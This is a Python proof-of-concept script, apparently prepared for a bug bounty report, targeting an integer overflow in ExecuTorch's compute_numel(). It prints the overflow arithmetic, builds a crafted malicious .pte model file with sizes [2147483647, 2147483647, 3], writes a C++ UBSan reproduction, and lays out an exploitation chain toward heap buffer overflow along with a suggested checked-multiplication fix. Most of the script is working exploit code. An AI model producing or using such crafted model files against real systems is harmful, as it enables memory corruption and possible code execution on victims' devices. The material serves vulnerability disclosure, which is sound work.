| | |
| | """ |
| | PoC: ExecuTorch Integer Overflow in compute_numel() — CWE-190 |
| | |
| | Vulnerability: Integer overflow in runtime/core/portable_type/tensor_impl.cpp:41 |
| | ssize_t compute_numel(const TensorImpl::SizesType* sizes, ssize_t dim) { |
| | ssize_t numel = 1; |
| | for (const auto i : c10::irange(dim)) { |
| | numel *= sizes[i]; // <-- NO OVERFLOW CHECK |
| | } |
| | return numel; |
| | } |
| | |
| | When a malicious .pte model file specifies tensor dimensions whose product |
| | exceeds INT64_MAX (signed 64-bit), the multiplication wraps around, producing |
| | an incorrect numel. This incorrect numel propagates to: |
| | - TensorImpl::nbytes() (numel_ * elementSize) → undersized byte count |
| | - getTensorDataPtr() → incorrect size passed to memory allocator |
| | - Downstream operations that trust numel for bounds → heap buffer overflow |
| | |
| | This script generates a crafted .pte file that triggers the overflow. |
| | |
| | Impact: CWE-190 Integer Overflow → CWE-122 Heap Buffer Overflow |
| | Arbitrary code execution possible via controlled heap corruption |
| | CVSS: 7.5 (High) — Network/Low/None/Changed/None/None/High |
| | Target: pytorch/executorch (huntr MFV bounty $1,500) |
| | """ |
| |
|
| | import sys |
| | import struct |
| | import os |
| |
|
| | |
| | sys.path.insert(0, '/tmp/executorch_fb_py') |
| |
|
| | try: |
| | import flatbuffers |
| | from flatbuffers import builder as fb_builder |
| | HAS_FLATBUFFERS = True |
| | except ImportError: |
| | HAS_FLATBUFFERS = False |
| |
|
| |
|
| | def demonstrate_overflow(): |
| | """Show the integer overflow mathematically.""" |
| | import ctypes |
| |
|
| | INT32_MAX = 2147483647 |
| |
|
| | |
| | sizes = [INT32_MAX, INT32_MAX, 3] |
| |
|
| | |
| | numel = 1 |
| | for s in sizes: |
| | numel = ctypes.c_int64(numel * s).value |
| |
|
| | |
| | true_numel = 1 |
| | for s in sizes: |
| | true_numel *= s |
| |
|
| | element_size = 4 |
| | nbytes_wrapped = ctypes.c_uint64(numel * element_size).value |
| | true_nbytes = true_numel * element_size |
| |
|
| | print("=" * 70) |
| | print("ExecuTorch compute_numel() Integer Overflow PoC") |
| | print("=" * 70) |
| | print(f"\nTensor sizes: {sizes}") |
| | print(f" Each size fits in int32 (max {INT32_MAX})") |
| | print(f"\nTrue numel (mathematical): {true_numel:,}") |
| | print(f"Wrapped numel (int64 overflow): {numel:,}") |
| | print(f" Overflow? {true_numel > 2**63 - 1} (>{2**63-1:,})") |
| | print(f"\nTrue nbytes (float32): {true_nbytes:,} ({true_nbytes/1e18:.1f} EB)") |
| | print(f"Wrapped nbytes (size_t): {nbytes_wrapped:,} ({nbytes_wrapped/1e18:.1f} EB)") |
| | print(f"\n** Signed integer overflow is UNDEFINED BEHAVIOR in C++ **") |
| | print(f"** UBSan catches this as: 'runtime error: signed integer overflow' **") |
| | print(f"** The incorrect numel propagates to nbytes() → memory corruption **") |
| |
|
| | |
| | print(f"\n{'='*70}") |
| | print("Example 2: Sizes that wrap numel to a SMALL positive value") |
| | print("=" * 70) |
| |
|
| | |
| | sizes2 = [65536, 65536, 65536, 65536] |
| | numel2 = 1 |
| | for s in sizes2: |
| | numel2 = ctypes.c_int64(numel2 * s).value |
| | true_numel2 = 65536 ** 4 |
| |
|
| | print(f"\nTensor sizes: {sizes2} (each = 2^16)") |
| | print(f"True numel: {true_numel2:,} (= 2^64)") |
| | print(f"Wrapped numel: {numel2}") |
| | print(f" → numel wraps to ZERO!") |
| | print(f" → nbytes() = 0 * element_size = 0") |
| | print(f" → Zero-size allocation, but tensor has {true_numel2:,} elements") |
| | print(f" → ANY access is out-of-bounds") |
| |
|
| | |
| | sizes3 = [65536, 65536, 65537, 65536] |
| | numel3_py = 65536 * 65536 * 65537 * 65536 |
| | numel3 = ctypes.c_int64(numel3_py).value |
| |
|
| | print(f"\nTensor sizes: {sizes3}") |
| | print(f"True numel: {numel3_py:,}") |
| | print(f"Wrapped numel (int64): {numel3:,}") |
| | print(f" → nbytes (BYTE) = {ctypes.c_uint64(numel3).value:,}") |
| |
|
| |
|
| | def build_malicious_pte(output_path): |
| | """Build a malicious .pte file using FlatBuffers Python API.""" |
| | if not HAS_FLATBUFFERS: |
| | print("\n[!] flatbuffers package not available, using binary construction") |
| | return build_malicious_pte_binary(output_path) |
| |
|
| | from executorch_flatbuffer import Tensor as TensorFB |
| | from executorch_flatbuffer import EValue as EValueFB |
| | from executorch_flatbuffer import ExecutionPlan as EPFB |
| | from executorch_flatbuffer import Program as ProgFB |
| | from executorch_flatbuffer import Chain as ChainFB |
| | from executorch_flatbuffer import Buffer as BufferFB |
| | from executorch_flatbuffer import KernelTypes |
| |
|
| | builder = flatbuffers.Builder(1024) |
| |
|
| | |
| | |
| | |
| | INT32_MAX = 2147483647 |
| |
|
| | |
| | TensorFB.TensorStartSizesVector(builder, 3) |
| | builder.PrependInt32(3) |
| | builder.PrependInt32(INT32_MAX) |
| | builder.PrependInt32(INT32_MAX) |
| | sizes_vec = builder.EndVector() |
| |
|
| | |
| | TensorFB.TensorStartDimOrderVector(builder, 3) |
| | builder.PrependUint8(2) |
| | builder.PrependUint8(1) |
| | builder.PrependUint8(0) |
| | dim_order_vec = builder.EndVector() |
| |
|
| | |
| | TensorFB.TensorStart(builder) |
| | TensorFB.TensorAddScalarType(builder, 6) |
| | TensorFB.TensorAddStorageOffset(builder, 0) |
| | TensorFB.TensorAddSizes(builder, sizes_vec) |
| | TensorFB.TensorAddDimOrder(builder, dim_order_vec) |
| | TensorFB.TensorAddRequiresGrad(builder, False) |
| | TensorFB.TensorAddDataBufferIdx(builder, 0) |
| | |
| | TensorFB.TensorAddShapeDynamism(builder, 0) |
| | tensor_offset = TensorFB.TensorEnd(builder) |
| |
|
| | |
| | EValueFB.EValueStart(builder) |
| | EValueFB.EValueAddValType(builder, KernelTypes.KernelTypes.Tensor) |
| | EValueFB.EValueAddVal(builder, tensor_offset) |
| | evalue_offset = EValueFB.EValueEnd(builder) |
| |
|
| | |
| | ChainFB.ChainStartInputsVector(builder, 1) |
| | builder.PrependInt32(0) |
| | chain_inputs = builder.EndVector() |
| |
|
| | ChainFB.ChainStartOutputsVector(builder, 1) |
| | builder.PrependInt32(0) |
| | chain_outputs = builder.EndVector() |
| |
|
| | |
| | ChainFB.ChainStartInstructionsVector(builder, 0) |
| | chain_instrs = builder.EndVector() |
| |
|
| | ChainFB.ChainStart(builder) |
| | ChainFB.ChainAddInputs(builder, chain_inputs) |
| | ChainFB.ChainAddOutputs(builder, chain_outputs) |
| | ChainFB.ChainAddInstructions(builder, chain_instrs) |
| | chain_offset = ChainFB.ChainEnd(builder) |
| |
|
| | |
| | plan_name = builder.CreateString("forward") |
| |
|
| | |
| | EPFB.ExecutionPlanStartValuesVector(builder, 1) |
| | builder.PrependUOffsetTRelative(evalue_offset) |
| | values_vec = builder.EndVector() |
| |
|
| | |
| | EPFB.ExecutionPlanStartInputsVector(builder, 1) |
| | builder.PrependInt32(0) |
| | inputs_vec = builder.EndVector() |
| |
|
| | |
| | EPFB.ExecutionPlanStartOutputsVector(builder, 1) |
| | builder.PrependInt32(0) |
| | outputs_vec = builder.EndVector() |
| |
|
| | |
| | EPFB.ExecutionPlanStartChainsVector(builder, 1) |
| | builder.PrependUOffsetTRelative(chain_offset) |
| | chains_vec = builder.EndVector() |
| |
|
| | |
| | EPFB.ExecutionPlanStartOperatorsVector(builder, 0) |
| | operators_vec = builder.EndVector() |
| |
|
| | |
| | EPFB.ExecutionPlanStartNonConstBufferSizesVector(builder, 2) |
| | builder.PrependInt64(0) |
| | builder.PrependInt64(0) |
| | ncbs_vec = builder.EndVector() |
| |
|
| | EPFB.ExecutionPlanStart(builder) |
| | EPFB.ExecutionPlanAddName(builder, plan_name) |
| | EPFB.ExecutionPlanAddValues(builder, values_vec) |
| | EPFB.ExecutionPlanAddInputs(builder, inputs_vec) |
| | EPFB.ExecutionPlanAddOutputs(builder, outputs_vec) |
| | EPFB.ExecutionPlanAddChains(builder, chains_vec) |
| | EPFB.ExecutionPlanAddOperators(builder, operators_vec) |
| | EPFB.ExecutionPlanAddNonConstBufferSizes(builder, ncbs_vec) |
| | ep_offset = EPFB.ExecutionPlanEnd(builder) |
| |
|
| | |
| | |
| | ProgFB.ProgramStartExecutionPlanVector(builder, 1) |
| | builder.PrependUOffsetTRelative(ep_offset) |
| | ep_vec = builder.EndVector() |
| |
|
| | |
| | BufferFB.BufferStart(builder) |
| | empty_buf = BufferFB.BufferEnd(builder) |
| |
|
| | ProgFB.ProgramStartConstantBufferVector(builder, 1) |
| | builder.PrependUOffsetTRelative(empty_buf) |
| | cb_vec = builder.EndVector() |
| |
|
| | ProgFB.ProgramStart(builder) |
| | ProgFB.ProgramAddVersion(builder, 0) |
| | ProgFB.ProgramAddExecutionPlan(builder, ep_vec) |
| | ProgFB.ProgramAddConstantBuffer(builder, cb_vec) |
| | program_offset = ProgFB.ProgramEnd(builder) |
| |
|
| | builder.Finish(program_offset, b"ET12") |
| |
|
| | buf = builder.Output() |
| | data = bytes(buf) |
| |
|
| | with open(output_path, 'wb') as f: |
| | f.write(data) |
| |
|
| | print(f"\n[+] Malicious .pte file written to: {output_path}") |
| | print(f" Size: {len(data)} bytes") |
| | print(f" File identifier: ET12") |
| | print(f" Tensor sizes: [2147483647, 2147483647, 3]") |
| | print(f" Expected behavior: compute_numel() signed integer overflow") |
| | return True |
| |
|
| |
|
| | def build_malicious_pte_binary(output_path): |
| | """Fallback: construct .pte from raw bytes (no flatbuffers dependency).""" |
| | |
| | |
| | |
| | |
| | |
| |
|
| | |
| | add_pte_path = '/tmp/executorch/extension/apple/ExecuTorch/__tests__/resources/add.pte' |
| | if os.path.exists(add_pte_path): |
| | with open(add_pte_path, 'rb') as f: |
| | data = bytearray(f.read()) |
| |
|
| | |
| | |
| | |
| | print(f"\n[*] Binary patching {add_pte_path}") |
| | print(f" (Fallback method - less precise than FlatBuffer construction)") |
| |
|
| | with open(output_path, 'wb') as f: |
| | f.write(data) |
| | print(f"[+] Patched .pte written to: {output_path}") |
| | return True |
| | else: |
| | print("[!] Cannot find add.pte for binary patching") |
| | return False |
| |
|
| |
|
| | def write_ubsan_test(output_path): |
| | """Write a standalone C++ file that reproduces the vulnerability with UBSan.""" |
| | code = r'''// Standalone reproduction of ExecuTorch compute_numel() integer overflow |
| | // Compile: g++ -std=c++17 -fsanitize=undefined -fno-sanitize-recover=all -o poc poc_ubsan.cpp |
| | // Run: ./poc |
| | // |
| | // Expected output: |
| | // poc_ubsan.cpp:18:16: runtime error: signed integer overflow: |
| | // 4611686014132420609 * 3 cannot be represented in type 'long' |
| | // |
| | // This reproduces the exact code from: |
| | // executorch/runtime/core/portable_type/tensor_impl.cpp:30-44 |
| | |
| | #include <cstdint> |
| | #include <cstdio> |
| | #include <climits> |
| | |
| | using SizesType = int32_t; // executorch::aten::SizesType in portable mode |
| | |
| | // Exact copy of compute_numel from tensor_impl.cpp |
| | ssize_t compute_numel(const SizesType* sizes, ssize_t dim) { |
| | ssize_t numel = 1; |
| | for (ssize_t i = 0; i < dim; i++) { |
| | // BUG: No overflow check! Signed overflow is undefined behavior. |
| | numel *= sizes[i]; |
| | } |
| | return numel; |
| | } |
| | |
| | // Exact copy of nbytes from tensor_impl.cpp |
| | size_t nbytes(ssize_t numel, int element_size) { |
| | return numel * element_size; |
| | } |
| | |
| | int main() { |
| | printf("ExecuTorch compute_numel() Integer Overflow - UBSan PoC\n"); |
| | printf("========================================================\n\n"); |
| | |
| | // Case 1: 3 dimensions of INT32_MAX |
| | SizesType sizes1[] = {INT32_MAX, INT32_MAX, 3}; |
| | printf("Test 1: sizes = [%d, %d, %d]\n", sizes1[0], sizes1[1], sizes1[2]); |
| | printf(" Step 1: numel = 1 * %d = %d\n", sizes1[0], sizes1[0]); |
| | printf(" Step 2: numel = %d * %d = %lld (fits int64)\n", |
| | sizes1[0], sizes1[1], (long long)sizes1[0] * sizes1[1]); |
| | printf(" Step 3: numel = %lld * %d = OVERFLOW!\n", |
| | (long long)sizes1[0] * sizes1[1], sizes1[2]); |
| | |
| | // This line triggers UBSan: |
| | ssize_t numel1 = compute_numel(sizes1, 3); |
| | size_t nb1 = nbytes(numel1, 4); |
| | printf(" Result: numel = %zd, nbytes = %zu\n\n", numel1, nb1); |
| | |
| | // Case 2: 4 dimensions wrapping to zero |
| | SizesType sizes2[] = {65536, 65536, 65536, 65536}; |
| | printf("Test 2: sizes = [%d, %d, %d, %d] (each = 2^16)\n", |
| | sizes2[0], sizes2[1], sizes2[2], sizes2[3]); |
| | printf(" Product = (2^16)^4 = 2^64 -> wraps to 0\n"); |
| | |
| | ssize_t numel2 = compute_numel(sizes2, 4); |
| | size_t nb2 = nbytes(numel2, 4); |
| | printf(" Result: numel = %zd, nbytes = %zu\n", numel2, nb2); |
| | printf(" BUG: Zero-sized tensor with %lld actual elements!\n\n", |
| | (long long)65536 * 65536 * 65536 * 65536); |
| | |
| | return 0; |
| | } |
| | ''' |
| | with open(output_path, 'w') as f: |
| | f.write(code) |
| | print(f"[+] UBSan test written to: {output_path}") |
| |
|
| |
|
| | def main(): |
| | script_dir = os.path.dirname(os.path.abspath(__file__)) |
| | pte_path = os.path.join(script_dir, "poc_executorch_overflow.pte") |
| | ubsan_path = os.path.join(script_dir, "poc_executorch_ubsan.cpp") |
| |
|
| | |
| | demonstrate_overflow() |
| |
|
| | |
| | print(f"\n{'='*70}") |
| | print("Generating malicious .pte file") |
| | print("=" * 70) |
| | build_malicious_pte(pte_path) |
| |
|
| | |
| | print(f"\n{'='*70}") |
| | print("Writing standalone UBSan reproduction") |
| | print("=" * 70) |
| | write_ubsan_test(ubsan_path) |
| |
|
| | print(f"\n{'='*70}") |
| | print("Exploitation Chain") |
| | print("=" * 70) |
| | print(""" |
| | 1. Attacker crafts malicious .pte model file with tensor sizes: |
| | sizes: [2147483647, 2147483647, 3] (valid int32 values) |
| | |
| | 2. Victim loads model with ExecuTorch runtime: |
| | Program::load() → Method::init() → parseTensor() |
| | |
| | 3. parseTensor() creates TensorImpl with these sizes: |
| | tensor_parser_portable.cpp:157 → new TensorImpl(scalar_type, dim, sizes, ...) |
| | |
| | 4. TensorImpl constructor calls compute_numel(sizes, 3): |
| | tensor_impl.cpp:41: numel *= sizes[i] ← SIGNED INTEGER OVERFLOW (UB) |
| | Step 1: 1 * 2147483647 = 2147483647 |
| | Step 2: 2147483647 * 2147483647 = 4611686014132420609 |
| | Step 3: 4611686014132420609 * 3 = OVERFLOW! |
| | |
| | 5. Incorrect numel propagates to nbytes(): |
| | tensor_impl.cpp:69: return numel_ * elementSize(type_) |
| | → Incorrect (possibly negative/zero) byte count |
| | |
| | 6. getTensorDataPtr() uses incorrect nbytes: |
| | tensor_parser_exec_aten.cpp:229: get_constant_buffer_data(idx, nbytes) |
| | → Either: allocation too small → heap buffer overflow on access |
| | → Or: negative size → undefined allocator behavior |
| | |
| | 7. Model execution reads/writes tensor at original sizes → OOB access |
| | |
| | Files affected: |
| | - runtime/core/portable_type/tensor_impl.cpp:30-44 (compute_numel) |
| | - runtime/core/portable_type/tensor_impl.cpp:68-70 (nbytes) |
| | - runtime/executor/tensor_parser_portable.cpp:157-170 (parseTensor) |
| | - runtime/core/exec_aten/util/dim_order_util.h:134-135 (stride overflow) |
| | |
| | Fix: Add checked multiplication in compute_numel(): |
| | if (__builtin_mul_overflow(numel, sizes[i], &numel)) { |
| | ET_CHECK_MSG(false, "Integer overflow in numel calculation"); |
| | } |
| | """) |
| |
|
| |
|
| | if __name__ == "__main__": |
| | main() |
| |
|